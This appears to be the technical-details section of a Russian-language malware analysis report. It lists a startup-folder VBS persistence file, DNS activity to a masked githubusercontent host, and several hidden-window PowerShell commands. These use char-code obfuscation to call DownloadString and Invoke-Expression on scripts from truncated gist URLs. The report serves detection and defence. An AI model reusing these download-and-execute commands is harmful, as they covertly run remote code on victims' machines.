Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\shvhost411.vbs
- 'gi##.###hubusercontent.com':443
- DNS ASK gi##.###hubusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/fadadaw194mail1w...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/nimis23233mailhu...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/fadadaw194mail1w...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/nimis23233mailhu...